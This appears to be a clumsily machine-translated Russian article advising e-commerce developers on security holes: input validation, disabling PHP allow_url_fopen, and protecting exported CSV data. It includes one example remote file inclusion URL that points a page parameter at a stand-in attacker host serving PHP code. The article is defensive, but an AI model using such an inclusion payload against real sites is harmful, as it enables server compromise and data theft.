E-коммерции - Подключение дыр в безопасности

Безопасность электронной коммерции сайт должен быть один из основных моментов при разработке сайта E-коммерция или программного обеспечения. Разработчик должен быть в курсе всех соображений безопасности при разработке сайта. С электронной торговли все большее распространение в эти дни, число атак, безусловно, возрастает. Паранойя это здоровая вещь для электронной коммерции Разработчики сайта, мы должны держать в ворота с вопросами безопасности, и держать наши глаза и уши открытыми. Хотя следующие серьезные лазейки, следующие лазейки, если настоящей легко исправлены.

Ниже перечислены некоторые соображения безопасности должны быть включены при разработке сайта. Данная статья не распространяется на E-кражи, пожалуйста, см. мою отдельную статью по этому вопросу.

Ввод пользователя - ввод каждого, будь то вступаем в количестве, поиск продуктов, введя имя и т.д., должны быть проверены на подозрительные символы. Если этого не сделать, то можно ввести "?>", закрытия конца тегов PHP и выполнять некоторый код PHP.

Гораздо безопаснее позволить цифр и букв AZ (столиц включен) и 0-9, и больше ничего, чем сделать список всех символов, которые не должны быть там. Проверка сценария необходимо, чтобы пролистать каждого символа по одному. Это должно быть достигнуто использованием проверки подлинности сервера в сторону, а не JavaScript. С помощью серверных проверки входных данных необходима для защиты от нежелательной символы

Там существует другая основным при выполнении PHP-кода. При использовании PHP есть параметр называется allow_url_fopen который позволит открытия файлов из сценариев PHP. Эта опция должна быть отключена, если не абсолютно необходимо.

Только представьте, у вас есть PHP скрипты для фиксированных верхних и нижних колонтитулов, а также для доступа к веб-страниц вам нужно набрать в http://www.mysite.com/index.php?page=page2. Все что требуется это злоумышленнику запускать сценарий, изменяя эти параметры, введя "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" с PHP код в файле "hacker.txt". Вы могли бы что-нибудь случится, PHP файла читать, удалены жизненно важные украденная информация.

Если вы не уверены, если этот параметр включен или выключен, скопируйте следующий код PHP в текстовый файл и загрузите его на свой веб-сервер:

phpinfo ();
?>

При доступе к скрипт на вашем веб-сервере, вы должны прийти через настройку конфигурации под allow_url_fopen.

Пользователь компьютера, при нормальных обстоятельствах не может найти значение этого параметра.

Будьте осторожны с экспортированные данные, как заказы, продукция в CSV и MySQL файлов. Если эти данные экспортируются из сценария и хранится на веб-сервере под общим т.е. имя файла. http://www.mysite.com/admin/output_tables.csv. Это только действительно проблема, когда экспортировала данные хранятся в файле в директории, которая является общедоступной. Существует два способа предотвратить эту лазейку безопасности - сначала в выходном файле за паролем каталогов, во-вторых, есть данные, расположенные внутри формы HTML Textarea элемент сценария. Владелец магазина, можно скопировать эту информацию из текстовых файлов и создать новый файл на свой компьютер и вставьте в них сведения.

Все что требуется это хакеров, чтобы найти этот файл, проверяя электронную демо-сайт торгово программного обеспечения и посмотреть на тот же файл на реальном сайте.

Rate Article

Related Videos
Play Video How to Strengthen Network Security with Cisco Network Manager	Play Video Understanding your Home Network Router #5 - Secure Your Network with WPA2	Play Video Learn About Secure Computing	Просмотр видео Как защитить компьютер Secure	Просмотр видео Как проверить параметры безопасности в Windows Vista

Ниже перечислены другие статьи, связанные с вышеуказанной статьи из статьи "Электронная торговля" категорию.

Люди, интересующиеся в вышеуказанной статье "Е-коммерции - Подключение дыр в безопасности", также заинтересованы в соответствующих статьях, перечисленных ниже: